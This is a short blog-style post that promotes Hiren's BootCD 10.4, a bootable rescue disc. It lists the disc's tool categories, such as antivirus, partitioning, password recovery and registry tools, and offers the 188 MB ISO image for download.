Hiren’s BootCD is an ultimate solution to almost all your computer problems. It comes loaded with hell lot of tools.Each of them is powerful and can be really very helpful if used with caution. You can solve nearly all your PC problems like virus infection, hdd failure, data recovery, Hard disk partitioning, password recovery using this CD.
  • Antivirus Tools
  • BIOS / CMOS Tools
  • Browsers / File Managers
  • FileSystems Tools
  • Hard Disk Tools
  • MBR (Master Boot Record) Tools
  • MultiMedia Tools
  • Ms Dos Tools
  • Network Tools
  • Optimizers
  • Partition Tools
  • Password Tools
  • Process Tools
  • RAM (Memory) Testing Tools
  • Recovery Tools
  • Registry Tools
  • Remote Control Tools
  • Security Tools
  • Startup Tools
  • System Information Tools
  • Testing Tools
  • Tweakers 
        You can read about these tools in more detail at-
The file available for download is an iso file. So you will have to burn it on a CD or DVD to use it or to boot from it.
Download Hiren’s Boot CD 10.4 (188 MB)